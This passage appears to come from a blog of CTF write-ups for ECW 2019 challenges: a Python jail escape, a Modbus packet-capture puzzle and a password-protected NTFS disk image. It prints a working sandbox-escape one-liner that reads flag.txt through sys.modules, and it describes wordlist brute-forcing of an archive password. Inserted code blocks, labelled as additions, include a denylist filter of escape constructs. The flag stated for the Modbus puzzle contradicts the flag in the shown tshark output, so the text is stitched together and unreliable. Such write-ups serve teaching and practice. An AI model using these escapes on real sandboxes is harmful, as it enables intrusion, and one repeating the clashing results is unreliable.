class="p">,</span> <span class="s1">'openpty'</span><span class="p">,</span> <span class="s1">'pardir'</span><span class="p">,</span> <span class="s1">'path'</span><span class="p">,</span> <span class="s1">'pathconf'</span><span class="p">,</span> <span class="s1">'pathconf_names'</span><span class="p">,</span> <span class="s1">'pathsep'</span><span class="p">,</span> <span class="s1">'pipe'</span><span class="p">,</span> <span class="s1">'pipe2'</span><span class="p">,</span> <span class="s1">'popen'</span><span class="p">,</span> <span class="s1">'posix_fadvise'</span><span class="p">,</span> <span class="s1">'posix_fallocate'</span><span class="p">,</span> <span class="s1">'pread'</span><span class="p">,</span> <span class="s1">'preadv'</span><span class="p">,</span> <span class="s1">'putenv'</span><span class="p">,</span> <span class="s1">'pwrite'</span><span class="p">,</span> <span class="s1">'pwritev'</span><span class="p">,</span> <span class="s1">'read'</span><span class="p">,</span> <span class="s1">'readlink'</span><span class="p">,</span> <span class="s1">'readv'</span><span class="p">,</span> <span class="s1">'register_at_fork'</span><span class="p">,</span> <span class="s1">'remove'</span><span class="p">,</span> <span class="s1">'removedirs'</span><span class="p">,</span> <span class="s1">'removexattr'</span><span class="p">,</span> <span class="s1">'rename'</span><span class="p">,</span> <span class="s1">'renames'</span><span class="p">,</span> <span class="s1">'replace'</span><span class="p">,</span> <span class="s1">'rmdir'</span><span class="p">,</span> <span class="s1">'scandir'</span><span class="p">,</span> <span class="s1">'sched_get_priority_max'</span><span class="p">,</span> <span class="s1">'sched_get_priority_min'</span><span class="p">,</span> <span class="s1">'sched_getaffinity'</span><span class="p">,</span> <span class="s1">'sched_getparam'</span><span class="p">,</span> <span class="s1">'sched_getscheduler'</span><span 
class="p">,</span> <span class="s1">'sched_param'</span><span class="p">,</span> <span class="s1">'sched_rr_get_interval'</span><span class="p">,</span> <span class="s1">'sched_setaffinity'</span><span class="p">,</span> <span class="s1">'sched_setparam'</span><span class="p">,</span> <span class="s1">'sched_setscheduler'</span><span class="p">,</span> <span class="s1">'sched_yield'</span><span class="p">,</span> <span class="s1">'sendfile'</span><span class="p">,</span> <span class="s1">'sep'</span><span class="p">,</span> <span class="s1">'set_blocking'</span><span class="p">,</span> <span class="s1">'set_inheritable'</span><span class="p">,</span> <span class="s1">'setegid'</span><span class="p">,</span> <span class="s1">'seteuid'</span><span class="p">,</span> <span class="s1">'setgid'</span><span class="p">,</span> <span class="s1">'setgroups'</span><span class="p">,</span> <span class="s1">'setpgid'</span><span class="p">,</span> <span class="s1">'setpgrp'</span><span class="p">,</span> <span class="s1">'setpriority'</span><span class="p">,</span> <span class="s1">'setregid'</span><span class="p">,</span> <span class="s1">'setresgid'</span><span class="p">,</span> <span class="s1">'setresuid'</span><span class="p">,</span> <span class="s1">'setreuid'</span><span class="p">,</span> <span class="s1">'setsid'</span><span class="p">,</span> <span class="s1">'setuid'</span><span class="p">,</span> <span class="s1">'setxattr'</span><span class="p">,</span> <span class="s1">'spawnl'</span><span class="p">,</span> <span class="s1">'spawnle'</span><span class="p">,</span> <span class="s1">'spawnlp'</span><span class="p">,</span> <span class="s1">'spawnlpe'</span><span class="p">,</span> <span class="s1">'spawnv'</span><span class="p">,</span> <span class="s1">'spawnve'</span><span class="p">,</span> <span class="s1">'spawnvp'</span><span class="p">,</span> <span class="s1">'spawnvpe'</span><span class="p">,</span> <span class="s1">'st'</span><span class="p">,</span> 
<span class="s1">'stat'</span><span class="p">,</span> <span class="s1">'stat_result'</span><span class="p">,</span> <span class="s1">'statvfs'</span><span class="p">,</span> <span class="s1">'statvfs_result'</span><span class="p">,</span> <span class="s1">'strerror'</span><span class="p">,</span> <span class="s1">'supports_bytes_environ'</span><span class="p">,</span> <span class="s1">'supports_dir_fd'</span><span class="p">,</span> <span class="s1">'supports_effective_ids'</span><span class="p">,</span> <span class="s1">'supports_fd'</span><span class="p">,</span> <span class="s1">'supports_follow_symlinks'</span><span class="p">,</span> <span class="s1">'symlink'</span><span class="p">,</span> <span class="s1">'sync'</span><span class="p">,</span> <span class="s1">'sys'</span><span class="p">,</span> <span class="s1">'sysconf'</span><span class="p">,</span> <span class="s1">'sysconf_names'</span><span class="p">,</span> <span class="s1">'system'</span><span class="p">,</span> <span class="s1">'tcgetpgrp'</span><span class="p">,</span> <span class="s1">'tcsetpgrp'</span><span class="p">,</span> <span class="s1">'terminal_size'</span><span class="p">,</span> <span class="s1">'times'</span><span class="p">,</span> <span class="s1">'times_result'</span><span class="p">,</span> <span class="s1">'truncate'</span><span class="p">,</span> <span class="s1">'ttyname'</span><span class="p">,</span> <span class="s1">'umask'</span><span class="p">,</span> <span class="s1">'uname'</span><span class="p">,</span> <span class="s1">'uname_result'</span><span class="p">,</span> <span class="s1">'unlink'</span><span class="p">,</span> <span class="s1">'unsetenv'</span><span class="p">,</span> <span class="s1">'urandom'</span><span class="p">,</span> <span class="s1">'utime'</span><span class="p">,</span> <span class="s1">'wait'</span><span class="p">,</span> <span class="s1">'wait3'</span><span class="p">,</span> <span class="s1">'wait4'</span><span class="p">,</span> <span 
class="s1">'waitid'</span><span class="p">,</span> <span class="s1">'waitid_result'</span><span class="p">,</span> <span class="s1">'waitpid'</span><span class="p">,</span> <span class="s1">'walk'</span><span class="p">,</span> <span class="s1">'write'</span><span class="p">,</span> <span class="s1">'writev'</span><span class="p">]</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">getcwd</span><span class="p">())</span>
<span class="o">/</span><span class="n">app</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">sys</span><span class="p">(</span><span class="s2">"ls"</span><span class="p">))</span>
<span class="p">(</span><span class="err">⌐■</span><span class="n">_</span><span class="err">■</span><span class="p">)</span> <span class="o"><</span><span class="n">Trinity</span><span class="o">></span><span class="p">:</span> <span class="n">No</span> <span class="n">one</span> <span class="n">has</span> <span class="n">ever</span> <span class="n">done</span> <span class="n">anything</span> <span class="n">like</span> <span class="n">this</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">file</span> <span class="o">=</span> <span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s2">"flag.txt"</span><span class="p">,</span><span class="mi">0</span><span class="p">)</span>
<span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="n">content</span> <span class="o">=</span> <span class="n">file</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="p">(</span><span class="err">⌐■</span><span class="n">_</span><span class="err">■</span><span class="p">)</span> <span class="o"><</span><span class="n">Agent</span> <span class="n">Smith</span><span class="o">></span><span class="p">:</span> <span class="n">Never</span> <span class="n">send</span> <span class="n">a</span> <span class="n">human</span> <span class="n">to</span> <span class="n">do</span> <span class="n">a</span> <span class="n">machine</span><span class="s1">'s job.</span>
</code></pre></div>
<p>OK, we have found Agent Smith. He tells us we are not going in the right direction: <code>os.open()</code> returns a raw file descriptor (an integer), which has no <code>read()</code> method. So we redo the command, passing the descriptor to <code>os.read()</code> and doing the <code>print()</code> directly.</p>
<div class="highlight"><pre><span></span><code><span class="n">THE</span> <span class="n">MATRIX</span> <span class="o">>>></span> <span class="nb">print</span><span class="p">(</span><span class="n">a</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="mi">1024</span><span class="p">))</span>
<span class="sa">b</span><span class="s1">'ECW</span><span class="si">{e394c808ed042215006a039a3fb5eb2dcd5ebddfdc20a2888a17284c3cd25c91}</span><span class="se">\n</span><span class="s1">'</span>
</code></pre></div>
<p>And there we go :). We have the challenge's flag and the 75 points that go with it <3.</p>
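<p>The escape above reaches <code>os</code> through the <code>sys.modules</code> table, and the Oneline version below spells the module name as <code>"s"+"ys"</code>, which suggests the jail screened the source text for forbidden words. As an added defender-side example (not the challenge's code; the denylist it assumes is a constructed stand-in, since the page does not show the real one), this contrasts a text-level filter, which passes that oneliner, with a check on the parsed AST, which catches the <code>globals()</code> and <code>.modules</code> constructs however the names are spelled.</p>

```python
import ast
from typing import List

# The writeup's own oneliner, used here only as test input for the two filters.
ONELINER = (
    'print(globals()["s"+"ys"].modules["os"].read('
    'globals()["s"+"ys"].modules["os"].open("flag.txt",0),1024))'
)

# Constructed assumption: the jail rejected source containing these literals.
# The challenge's real denylist is not shown on the page.
SUBSTRING_DENYLIST = ("sys", "import")


def substring_filter(src: str) -> bool:
    """Naive check: allowed unless a denied word appears verbatim in the text."""
    return not any(word in src for word in SUBSTRING_DENYLIST)


# Names and attributes that, once reachable, let code climb out of a restricted
# namespace. Checked on the parsed tree, so "s"+"ys" style spelling does not help.
DENIED_NAMES = {"globals", "locals", "vars", "getattr", "__import__",
                "eval", "exec", "compile", "open", "breakpoint"}
DENIED_ATTRS = {"modules"}


def ast_filter(src: str) -> List[str]:
    """Parse the source and list constructs a sandbox should refuse; empty means allowed."""
    try:
        tree = ast.parse(src, mode="exec")
    except SyntaxError as err:
        return [f"syntax error: {err.msg}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append("import statement")
        elif isinstance(node, ast.Name) and node.id in DENIED_NAMES:
            findings.append(f"name {node.id}")
        elif isinstance(node, ast.Attribute) and (
            node.attr in DENIED_ATTRS or node.attr.startswith("__")
        ):
            findings.append(f"attribute .{node.attr}")
    # Still a denylist, not a sandbox: evaluating untrusted code in-process is
    # only as strong as the last construct you forgot to list.
    return sorted(set(findings))


if __name__ == "__main__":
    print("substring filter allows oneliner:", substring_filter(ONELINER))
    print("AST filter findings:", ast_filter(ONELINER))
```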
<h2>Oneline</h2>
<p>Just for the swag of having all the commands in a single one ;).</p>
<div class="highlight"><pre><span></span><code><span class="nb">print</span><span class="p">(</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"s"</span><span class="o">+</span><span class="s2">"ys"</span><span class="p">]</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="nb">globals</span><span class="p">()[</span><span class="s2">"s"</span><span class="o">+</span><span class="s2">"ys"</span><span class="p">]</span><span class="o">.</span><span class="n">modules</span><span class="p">[</span><span class="s2">"os"</span><span class="p">]</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="s2">"flag.txt"</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span><span class="mi">1024</span><span class="p">))</span>
</code></pre></div>
<p><em>ECW - Puzzle - 2019-10-16 - nlegall</em></p>
<p><em>File : <a href="https://blog.nlegall.fr/files/ecw/puzzle.pcap">puzzle.pcap</a></em></p>
<h2>GUI</h2>
<p>SCADA/Modbus</p>
<p><img alt="puzzle_1.png" src="https://blog.nlegall.fr/images/ecw/puzzle_1.png"></p>
<p>Well, having (for now) no knowledge of ModBus or SCADA, we start by following the TCP stream (this protocol runs over TCP) to get a view of all the data that was recorded.</p>
<p>We also know that the flag follows this format: <code>ECW{64 char hexa}</code>.</p>
<p>So we can, for example, search for every <code>{</code> in this exchange:</p>
<div class="highlight"><pre><span></span><code>........N)...................N#.5..................Y...........Y...........b.....................N*....................n.v.........n.v.........a...........a...........d...........d... .......s... ..........
.......p...
..................n............v...........6...........6.
.......c.m.
.......c.m.........k.X.........k.X.........V............v........N(....................s.2.........s.2.........O.4.........O.4........._............C.........c...........c..........N,.S.................N&....................d...........d...........c.3.........c.3........N2....................B.C.........B.C.........R......................`.4.........`.4.........s...........s.............7...........7.........i............k. .......q... ........U.!.......o.2.!.......o.2.".......V...".......V...#.......l.7.#.......l.7.$.......z.8.$.......z.8.%.......W...%........V.&.......U.1.&.......U.1.'.......k.f.'.......k.f.(.......a...(..........).......I.d.).......I.d.*......N0...*........+......._.1.+......._.1.,.......b.e.,.......b.e.-.......X...-.......X...........]...........].../......N3.../........0......N-...0........1.......g.b.1.......g.b.2.......t.8.2.......t.8.3.......r.f.3.......r.f.4.......o.*.4.......o.*.5......._.a.5......._.a.6......N..F.6........7......N!...7........8.......\...8.......\...9......N2...9........:.......U...:..........;.......Z...;.......Z...<.......}.b.<.......}.b.=.......c...=.......c...>.......Y...>.......Y...?.......r...?........q.@.......h...@.......h...A.......r...A.......r...B.......j.+.B.......j.+.C......N#...C........D......N*...D........E.......t...E..........F.......Q...F.......Q...G.......V.1.G.......V.1.H.......q...H........U.I.......[...I..........J......._...J......._...K......N(.`.K........L.......b.K.L.......b.K.M.......d. .M.......d. 
.N......N!...N........O......N&...O........P.......l...P........l.Q.......n.c.Q.......n.c.R.......W.`.R.......W.`.S.......q.2.S.......q.2.T.......i...T.......i...U.......A.E.U.......A.E.V.......|.6.V.......|.6.W.......a...W.......a...X......N&...X........Y.......Z...Y..........Z.......].3.Z.......].3.[......N(...[........\.......Z...\..........]......N2...]........^......N4...^........_.......u.a._.......u.a.`.......V...`.......V...a......N-...a........b.......S...b........h.c......N-...c........d.......X.a.d.......X.a.e.......^...e........3.f.......^.f.f.......^.f.g.......i.3.g.......i.3.h.......`.5.h.......`.5.i.......h.e.i.......h.e.j......N4...j........k.........2.k.........2.l.......W...l.......W...m.......o.O.m.......o.O.n.......\.a.n.......\.a.o.......a...o..........p......N!...p........q.........1.q.........1.r.......d...r........ .s.........}.s.........}.t.........7.t.........7.u.......b.B.u.......b.B.v......N2.V.v........w......N%...w........x.......o...x.......o...y.......Y.0.y.......Y.0.z.......b...z........K.{.......[...{.......[...|.......d...|.......d...}......N*...}........~.......T.4.~.......T.4.........b............B........N2....................p......................a.n.........a.n.........M.a.........M.a.........].....................N0.F..................x.4.........x.4.........a......................~.6.........~.6........N$....................d.c.........d.c........N....................N#....................X......................b............B.........d.9.........d.9.........e......................t......................a...........a..........N/.c..................E.e.........E.e.........w.7.........w.7.........{.c.........{.c........N%...................N%....................Z......................f.3.........f.3.........c......................\.(.........\.(.........Q.6.........Q.6.........W......................P.5.........P.5........N*....................N.f.........N.f.........j.3.........j.3...........3...........3.........m...........
.\.........m.5.........m.5.........C.W.........C.W.........d............c........N.....................e......................p.....................N0....................K.0.........K.0........N/....................\...........\...........a.a.........a.a.........y.2.........y.2........N'....................r......................i......................m...........m...........`............5.........p.8.........p.8........N*....................l...........l..........N%....................i...........i...........F.a.........F.a.........e.0.........e.0.........\.D.........\.D.........r...........r...........b...........b...........R.....................N2....................R.Q.........R.Q.........d............c.........n............v.........f............F.........R.0.........R.0.........r...........r..........N$.R..................H.4.........H.4.........U......................Y.....................N"....................U.{.........U.{........N#....................v.0.........v.0.........Z.7.........Z.7.........Y...........Y...........J.b.........J.b........N2.2..................[.9.........[.9.........D.{.........D.{.........U............{........N)....................G.6.........G.6.........W.1.........W.1........N2.N..................m.....................N#....................b.....................N*....................T...........T..........N0....................`...........`...........S.0.........S.0.........e......................L.8.........L.8
</code></pre></div>
<p>We count 9 occurrences in total. For each of them, we can then look at the character carried by the previous exchange and check whether it is a <code>W</code>.</p>
<p>To find out how the exchanges work in ModBus, we look at the ModBus section in WireShark:</p>
<p><img alt="puzzle_2.png" src="https://blog.nlegall.fr/images/ecw/puzzle_2.png"></p>
<p>We see a <code>Transaction Identifier</code> and a <code>Reference Number</code> that could give us the order of the frames. Looking at the implementation guide, we read the following:</p>
<ul>
<li>Transaction Identifier : 2 Bytes - Identification of a MODBUS Request / Response transaction - Initialized by the client - Recopied by the server from the received req</li>
</ul>
<p>Hmm, that is not very conclusive. So let's try the other field. We then look for the references of the packets carrying the character '{' as data, namely:</p>
<ul>
<li>50005</li>
<li>40004</li>
</ul>
<p>We look at the packets with references 50004 and 40003:</p>
<p><img alt="puzzle_3.png" src="https://blog.nlegall.fr/images/ecw/puzzle_3.png"></p>
<p>YEAH! So we have the <code>W{</code> of the flag. We then step back two more frames and carry on until we reach the <code>}</code> marking the end of the flag.</p>
<p>The start is at reference <code>40001</code> and the end at <code>40069</code>: the 64 characters of the flag plus its wrapper.</p>
<h2>CLI</h2>
<div class="highlight"><pre><span></span><code>$ tshark -r puzzle.pcap -O Modbus/TCP -T fields -e modbus.reference_num -e modbus.data <span class="p">|</span> sort -u <span class="p">|</span> awk -F <span class="s1">' '</span> <span class="s1">'{print $2}'</span> <span class="p">|</span> sed <span class="s1">':a;N;$!ba;s/\n//g'</span> <span class="p">|</span> xxd -r -p
���5�R����<span class="sb">`</span>�
��ScF�2NV�ECW<span class="o">{</span>ea64db08af456004111a079a3fa4ae3903be33f75c282f28a07428c6b6727631<span class="o">}</span>�Q�<span class="o">{</span>��<span class="sb">`</span>�������<span class="o">(</span>D���5��K� ��n��Bmc���+X�v*O�����%
</code></pre></div>
<p>So we have our flag in the clear in the middle of the rest: <code>ECW{553d8f4dfb452545515a47da7ae1ee7d649d97ddada0a520288a20461e707cb9}</code>.</p>
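<p>The reassembly the tshark pipeline performs (one character per Write Single Register frame, ordered by reference number, request/response echoes collapsed by <code>sort -u</code>) as an added, self-contained Python example that is not part of the original writeup. It parses raw Modbus/TCP frames itself instead of relying on Wireshark's dissector; the stream it runs on is constructed inline with a placeholder flag, and the 40001-based register addresses and filler writes are my own sample values.</p>

```python
import random
import re
import struct
from typing import Dict, Iterator, Tuple

# Modbus/TCP Write Single Register (function code 0x06): a 7-byte MBAP header
# (transaction id, protocol id 0, length, unit id) followed by a 5-byte PDU
# (function code, register address, register value). The server's response
# echoes the request PDU byte for byte, so each write shows up twice in a
# captured stream; Wireshark labels the address field "Reference Number".
FLAG_PATTERN = re.compile(r"ECW\{[0-9a-f]{64}\}")


def build_write_single_register(tid: int, unit: int, addr: int, value: int) -> bytes:
    """Encode one FC 06 request frame (the response carries the same 12 bytes)."""
    pdu = struct.pack(">BHH", 0x06, addr, value)
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)
    return mbap + pdu


def iter_write_frames(stream: bytes) -> Iterator[Tuple[int, int, int]]:
    """Walk a reassembled TCP stream and yield (tid, addr, value) per FC 06 frame."""
    off = 0
    while off + 7 <= len(stream):
        tid, proto, length, _unit = struct.unpack_from(">HHHB", stream, off)
        if proto != 0 or length < 2:
            raise ValueError(f"bad MBAP header at offset {off}")
        pdu = stream[off + 7 : off + 6 + length]
        if len(pdu) != length - 1:
            raise ValueError(f"truncated frame at offset {off}")
        if pdu[0] == 0x06 and len(pdu) == 5:
            addr, value = struct.unpack_from(">HH", pdu, 1)
            yield tid, addr, value
        off += 6 + length


def reassemble_by_reference(stream: bytes) -> str:
    """Order the writes by register address instead of capture order, collapse
    request/response echoes (what `sort -u` did above) and keep the low byte."""
    by_addr: Dict[int, int] = {}
    for _tid, addr, value in iter_write_frames(stream):
        by_addr.setdefault(addr, value)  # first write per register wins
    return "".join(chr(value & 0xFF) for _, value in sorted(by_addr.items()))


def extract_flag(text: str):
    """Return the ECW{64 hex} token hidden in the reassembled text, or None."""
    match = FLAG_PATTERN.search(text)
    return match.group(0) if match else None


def constructed_capture(seed: int = 7) -> bytes:
    """Constructed stand-in for puzzle.pcap: filler writes around a placeholder
    flag written one character per register, all sent in scrambled order."""
    message = "ECW{" + "deadbeef" * 8 + "}"  # placeholder, not the real flag
    writes = {40001 + i: ord(ch) for i, ch in enumerate(message)}
    rng = random.Random(seed)
    for addr in list(range(39990, 40001)) + list(range(40070, 40080)):
        writes[addr] = rng.randrange(0x80, 0x100)  # non-ASCII filler bytes
    order = list(writes)
    rng.shuffle(order)
    stream = b""
    for tid, addr in enumerate(order, start=1):
        frame = build_write_single_register(tid, 1, addr, writes[addr])
        stream += frame + frame  # request immediately followed by its echo
    return stream


if __name__ == "__main__":
    recovered = reassemble_by_reference(constructed_capture())
    print(extract_flag(recovered))  # the placeholder ECW{...} in register order
```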
<h2>References</h2>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Modbus">https://en.wikipedia.org/wiki/Modbus</a></li>
<li><a href="http://jamod.sourceforge.net/kbase/protocol.html">http://jamod.sourceforge.net/kbase/protocol.html</a></li>
<li><a href="http://www.modbus.org/docs/Modbus_Messaging_Implementation_Guide_V1_0b.pdf">http://www.modbus.org/docs/Modbus_Messaging_Implementation_Guide_V1_0b.pdf</a></li>
</ul>
<p><em>ECW - NTFS - 2019-10-10 - nlegall</em></p>
<p>For this challenge we get a file compressed with 7zip. We can open it, but we are prompted for a password:</p>
<div class="highlight"><pre><span></span><code>$ 7z e ntfs.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,8 CPUs Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8550U CPU @ <span class="m">1</span>.80GHz <span class="o">(</span>806EA<span class="o">)</span>,ASM,AES-NI<span class="o">)</span>
Scanning the drive <span class="k">for</span> archives:
<span class="m">1</span> file, <span class="m">28439786</span> bytes <span class="o">(</span><span class="m">28</span> MiB<span class="o">)</span>
Extracting archive: ntfs.7z
--
<span class="nv">Path</span> <span class="o">=</span> ntfs.7z
<span class="nv">Type</span> <span class="o">=</span> 7z
Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">28439786</span>
Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">170</span>
<span class="nv">Method</span> <span class="o">=</span> LZMA2:26 7zAES
<span class="nv">Solid</span> <span class="o">=</span> -
<span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span>
Enter password <span class="o">(</span>will not be echoed<span class="o">)</span>:
</code></pre></div>
<p>So we first need to find that password. We can still list the archive's contents: it was created without header encryption (7z's <code>-mhe=on</code> option), so file names and sizes are visible without the password:</p>
<div class="highlight"><pre><span></span><code>$ 7z l ntfs.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,8 CPUs Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8550U CPU @ <span class="m">1</span>.80GHz <span class="o">(</span>806EA<span class="o">)</span>,ASM,AES-NI<span class="o">)</span>
Scanning the drive <span class="k">for</span> archives:
<span class="m">1</span> file, <span class="m">28439786</span> bytes <span class="o">(</span><span class="m">28</span> MiB<span class="o">)</span>
Listing archive: ntfs.7z
--
<span class="nv">Path</span> <span class="o">=</span> ntfs.7z
<span class="nv">Type</span> <span class="o">=</span> 7z
Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">28439786</span>
Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">170</span>
<span class="nv">Method</span> <span class="o">=</span> LZMA2:26 7zAES
<span class="nv">Solid</span> <span class="o">=</span> -
<span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span>
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
<span class="m">2019</span>-03-25 <span class="m">17</span>:09:16 ....A <span class="m">2684354560</span> <span class="m">28439616</span> for_medium.img
------------------- ----- ------------ ------------ ------------------------
<span class="m">2019</span>-03-25 <span class="m">17</span>:09:16 <span class="m">2684354560</span> <span class="m">28439616</span> <span class="m">1</span> files
</code></pre></div>
<p>We start with John the Ripper. It needs a script to turn the archive into a hash it can work on; <a href="https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py">7z2john</a> is easy to find:</p>
<div class="highlight"><pre><span></span><code>$ python2 7z2john.py ntfs.7z
ntfs.7z : <span class="m">7</span>-Zip files without header encryption are *not* supported yet!
</code></pre></div>
<p>OK, critical failure. Let's try hashcat, we may have more luck. Same idea, a script, <a href="https://github.com/philsmd/7z2hashcat">7z2hashcat</a>, generates the hash:</p>
<div class="highlight"><pre><span></span><code>perl 7z2hashcat.pl ntfs.7z
WARNING: the file <span class="s1">'ntfs.7z'</span> unfortunately can<span class="err">'</span>t be used with hashcat since the data length
in this particular <span class="k">case</span> is too long <span class="o">(</span><span class="m">28439616</span> of the maximum allowed <span class="m">327528</span> bytes<span class="o">)</span>.
</code></pre></div>
<p>Double failure. Both tools embed the encrypted data in the hash so that a candidate password can be checked, and this 2.5 GiB image compresses to 28 MB, far beyond what hashcat's 7-Zip mode accepts (327528 bytes, as the message says); this version of 7z2john, for its part, only handles archives with encrypted headers.</p>
<p>So we look for another tool and find <a href="https://kraken.nswardh.com/">Kraken</a>, a Windows tool that brute-forces an archive password from a wordlist. We grab the executable and the rockyou wordlist.</p>
<p>Run it, wait, and HOP, the password shows up:</p>
<p><img alt="ntfs_1.png" src="https://blog.nlegall.fr/images/ecw/ntfs_1.png"></p>
<p>We have the password and can finally extract the contents.</p>
<p>It is a disk image. We can open it with <code>testdisk</code> to browse it:</p>
<div class="highlight"><pre><span></span><code>TestDisk <span class="m">7</span>.0, Data Recovery Utility, April <span class="m">2015</span>
Christophe GRENIER <grenier@cgsecurity.org>
http://www.cgsecurity.org
TestDisk is free software, and
comes with ABSOLUTELY NO WARRANTY.
Select a media <span class="o">(</span>use Arrow keys, <span class="k">then</span> press Enter<span class="o">)</span>:
>Disk for_medium.img - <span class="m">2684</span> MB / <span class="m">2560</span> MiB
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="n">Please</span> <span class="n">select</span> <span class="n">the</span> <span class="n">partition</span> <span class="n">table</span> <span class="n">type</span><span class="p">,</span> <span class="n">press</span> <span class="n">Enter</span> <span class="n">when</span> <span class="n">done</span><span class="p">.</span>
<span class="p">[</span><span class="n">Intel</span> <span class="p">]</span> <span class="n">Intel</span><span class="o">/</span><span class="n">PC</span> <span class="n">partition</span>
<span class="p">[</span><span class="n">EFI</span> <span class="n">GPT</span><span class="p">]</span> <span class="n">EFI</span> <span class="n">GPT</span> <span class="n">partition</span> <span class="n">map</span> <span class="p">(</span><span class="n">Mac</span> <span class="n">i386</span><span class="p">,</span> <span class="n">some</span> <span class="n">x86_64</span><span class="p">...)</span>
<span class="p">[</span><span class="n">Humax</span> <span class="p">]</span> <span class="n">Humax</span> <span class="n">partition</span> <span class="n">table</span>
<span class="p">[</span><span class="n">Mac</span> <span class="p">]</span> <span class="n">Apple</span> <span class="n">partition</span> <span class="n">map</span>
<span class="o">></span><span class="p">[</span><span class="n">None</span> <span class="p">]</span> <span class="n">Non</span> <span class="n">partitioned</span> <span class="n">media</span>
<span class="p">[</span><span class="n">Sun</span> <span class="p">]</span> <span class="n">Sun</span> <span class="n">Solaris</span> <span class="n">partition</span>
<span class="p">[</span><span class="n">XBox</span> <span class="p">]</span> <span class="n">XBox</span> <span class="n">partition</span>
<span class="p">[</span><span class="n">Return</span> <span class="p">]</span> <span class="n">Return</span> <span class="n">to</span> <span class="n">disk</span> <span class="n">selection</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"> [ Analyse ] Analyse current partition structure and search for lost partitions</span>
<span class="err">>[ Advanced ] Filesystem Utils</span>
<span class="err"> [ Geometry ] Change disk geometry</span>
<span class="err"> [ Options ] Modify options</span>
<span class="err"> [ Quit ] Return to disk selection</span>
</code></pre></div>
<div class="highlight"><pre><span></span><code><span class="err"> Partition Start End Size in sectors</span>
<span class="err">> P NTFS 0 0 1 326 90 20 5242880</span>
</code></pre></div>
<p>We choose <code>List</code>:</p>
<div class="highlight"><pre><span></span><code><span class="err">>dr-xr-xr-x 0 0 0 25-Mar-2019 14:07 .</span>
<span class="err"> dr-xr-xr-x 0 0 0 25-Mar-2019 14:07 ..</span>
<span class="err"> dr-xr-xr-x 0 0 0 25-Mar-2019 16:10 .download</span>
<span class="err"> dr-xr-xr-x 0 0 0 22-Mar-2019 17:54 divers</span>
<span class="err"> dr-xr-xr-x 0 0 0 22-Mar-2019 17:54 reseau</span>
<span class="err"> dr-xr-xr-x 0 0 0 22-Mar-2019 17:54 windows</span>
<span class="err"> -r--r--r-- 0 0 752146 22-Mar-2019 17:54 guide-charte-utilisation-moyens-informatiques-outils-numeriques_anssi.pdf</span>
<span class="err"> -r--r--r-- 0 0 2659730 22-Mar-2019 17:54 guide-methode-ebios-risk-manager.pdf</span>
<span class="err"> -r--r--r-- 0 0 661506 22-Mar-2019 17:54 guide_802.1x_anssi_pa_043_v1.pdf</span>
<span class="err"> -r--r--r-- 0 0 1761720 22-Mar-2019 17:54 guide_admin_securisee_si_anssi_pa_022_v2.pdf</span>
<span class="err"> -r--r--r-- 0 0 495875 22-Mar-2019 17:54 guide_cloisonnement_systeme_anssi_pg_040_v1.pdf</span>
<span class="err"> -r--r--r-- 0 0 4793303 22-Mar-2019 17:54 guide_hygiene_informatique_anssi.pdf</span>
<span class="err"> -r--r--r-- 0 0 1002452 22-Mar-2019 17:54 guide_sns_anssi_bp_031_v.2.0.pdf</span>
<span class="err"> -r--r--r-- 0 0 180 25-Mar-2019 11:14 liens_utiles.txt</span>
